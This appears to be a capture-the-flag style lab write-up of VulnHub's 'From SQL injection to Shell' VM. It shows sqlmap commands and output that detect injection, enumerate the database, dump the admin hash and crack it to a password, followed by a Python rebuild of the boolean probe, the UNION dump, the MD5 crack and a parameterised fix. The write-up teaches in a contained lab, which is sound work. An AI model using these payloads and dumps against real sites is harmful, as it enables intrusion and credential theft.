※ Never attack systems you do not manage yourself.
Official site
Target machine
I used VulnHub's Pentester Lab: From SQL injection to Shell.
Installation
- Download the ISO from VulnHub
- Start VirtualBox and click New
  - Name and operating system
    - Name: Pentester Lab: From SQL injection to Shell
    - Type: Linux
    - Subtype: Ubuntu
    - Version: Ubuntu (64-bit)
  - Finish
- Select the created virtual machine and open Settings
  - Network
    - Adapter 1
      - Attached to: Host-only Adapter (keeps the deliberately vulnerable VM reachable only from the host, not from the LAN or the internet)
- Start the created virtual machine
Penetration test
- First, walk the menu links.
Home: http://192.168.56.112/all.php
test: http://192.168.56.112/cat.php?id=1
ruxcon: http://192.168.56.112/cat.php?id=2
2010: http://192.168.56.112/cat.php?id=3
All pictures: http://192.168.56.112/all.php
Admin: http://192.168.56.112/admin/login.php
- test, ruxcon and 2010 all take a query parameter (id), so those are the candidates for injection.
sqlmap reports the id parameter as injectable (boolean-based blind, error-based, time-based blind and UNION query) and finishes by fingerprinting the back-end DBMS, so the vulnerability is confirmed. The UNION technique is the one that makes the later dumps fast; the Suhosin warning means long payloads may be truncated, which can cause problems during enumeration.
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell]
└─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" --batch
...
[08:35:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
...
[08:35:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
...
[08:36:00] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
...
[08:36:00] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[08:36:00] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1606=1606

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x71626b7871,(SELECT (ELT(1607=1607,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 9653 FROM (SELECT(SLEEP(5)))vhpf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7871,0x615250654c62566b7368686f4e6b4c4843796a61416e67636b666355466666494e5641726d50617a,0x71787a6271),NULL-- -
---
[08:36:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[08:36:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112'

[*] ending @ 08:36:00 /2025-08-20/
- Enumerate the databases.
There are two: information_schema (MySQL's built-in metadata schema) and photoblog (the application's own database).
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell]
└─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" --dbs
...
[08:45:30] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] photoblog

[08:45:30] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112'

[*] ending @ 08:45:30 /2025-08-20/
- Enumerate the tables.
photoblog.users most likely holds the login credentials.
- information_schema
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell]
└─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D information_schema --tables
...
[08:47:16] [INFO] fetching tables for database: 'information_schema'
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

[08:47:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112'

[*] ending @ 08:47:16 /2025-08-20/
- photoblog
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell]
└─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D photoblog --tables
...
[08:47:35] [INFO] fetching tables for database: 'photoblog'
Database: photoblog
[3 tables]
+------------+
| categories |
| pictures   |
| users      |
+------------+

[08:47:35] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112'

[*] ending @ 08:47:35 /2025-08-20/
- Dump the rows.
The login credentials are found. The password column holds an unsalted 32-hex-character MD5 hash; because --batch accepts sqlmap's default prompts, sqlmap runs its built-in dictionary attack automatically and recovers the plaintext P4ssw0rd for admin.
┌──(kali㉿kali)-[~/Study/VulnHub/pentester-lab-from-sql-injection-to-shell]
└─$ sqlmap -u "http://192.168.56.112/cat.php?id=1" -D photoblog -T users --dump --batch
...
[08:53:08] [INFO] cracked password 'P4ssw0rd' for user 'admin'
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[08:53:17] [INFO] table 'photoblog.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.112/dump/photoblog/users.csv'
[08:53:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.112'

[*] ending @ 08:53:17 /2025-08-20/
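To show what sqlmap is actually doing in the detection step above and in this dump, here is an added example (not part of the original post, and not the lab's own code) that rebuilds the three steps by hand against an in-memory SQLite stand-in for the photoblog database. The table names are the ones sqlmap listed; the column layouts of pictures and users, the picture rows and the wordlist are assumptions. The boolean payload (1 AND 1606=1606 versus a false variant) is the one sqlmap reported; the UNION payload keeps sqlmap's four-column shape but uses SQLite's || in place of MySQL's CONCAT(). A parameterised version of the same query is included so the same payloads can be seen failing against it, and the dumped hash from the output above is cracked with a plain MD5 wordlist attack, which is what sqlmap's built-in dictionary attack does.

```python
import hashlib
import sqlite3

# The hash exactly as it appears in the sqlmap dump above.
ADMIN_HASH = "8efe310f9ab3efeae8d410a8e0166eb2"

# Constructed wordlist for the example; a real run would use sqlmap's
# bundled wordlist or something like rockyou.txt.
WORDLIST = ["password", "admin", "Password1", "P4ssw0rd", "letmein"]


def build_db():
    """In-memory stand-in for the photoblog database.

    Table names match the sqlmap --tables output. The column layouts are
    assumptions (the lab's real schema is not shown on the page); pictures
    has four columns because sqlmap found a 4-column UNION.
    """
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE categories(id INTEGER, name TEXT);
        CREATE TABLE pictures(id INTEGER, title TEXT, img TEXT, cat INTEGER);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO categories VALUES (1,'test'),(2,'ruxcon'),(3,'2010');
        INSERT INTO pictures VALUES (1,'Ruxcon 2010','ruxcon.jpg',1),
                                    (2,'Test picture','test.jpg',1);
    """)
    con.execute("INSERT INTO users VALUES (1,'admin',?)", (ADMIN_HASH,))
    return con


def cat_php_vulnerable(con, id_param):
    """Mimics a cat.php that splices the raw ?id= value into the query."""
    sql = "SELECT * FROM pictures WHERE cat=" + id_param
    return con.execute(sql).fetchall()


def cat_php_fixed(con, id_param):
    """Hardened variant: integer coercion plus a bound parameter."""
    cat = int(id_param)  # any injection payload fails here with ValueError
    return con.execute("SELECT * FROM pictures WHERE cat=?", (cat,)).fetchall()


def boolean_probe(handler, con):
    """Boolean-based blind check, as in sqlmap's 'id=1 AND 1606=1606' finding.

    Injectable means the true and false variants return different results.
    """
    try:
        true_rows = handler(con, "1 AND 1606=1606")
        false_rows = handler(con, "1 AND 1606=1607")
    except ValueError:
        return False  # the hardened handler rejects the payload outright
    return len(true_rows) != len(false_rows)


def union_dump_users(con):
    """UNION-based dump of photoblog.users through the vulnerable handler.

    Same four-column shape as sqlmap's payload; SQLite concatenates with ||
    where the MySQL payload used CONCAT().
    """
    payload = "1 UNION ALL SELECT NULL,NULL,login||':'||password,NULL FROM users-- -"
    rows = cat_php_vulnerable(con, payload)
    # The injected rows are the ones whose id column is NULL.
    return [row[2] for row in rows if row[0] is None]


def crack_md5(hash_hex, wordlist):
    """Offline dictionary attack on an unsalted MD5 hash."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hash_hex:
            return word
    return None


if __name__ == "__main__":
    con = build_db()
    print("vulnerable cat.php injectable:", boolean_probe(cat_php_vulnerable, con))
    print("fixed cat.php injectable:     ", boolean_probe(cat_php_fixed, con))
    for entry in union_dump_users(con):
        login, digest = entry.split(":")
        print(login, digest, "->", crack_md5(digest, WORDLIST))
```

The boolean probe is the whole idea behind blind injection: the page only has to look different for a true and a false condition. The UNION dump is why sqlmap's --dump finished in seconds rather than having to extract the hash one bit at a time, and the unsalted MD5 is why the dictionary attack succeeds instantly.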
- Logging in to /admin/login.php with admin / P4ssw0rd succeeds!
That concludes the penetration test with sqlmap.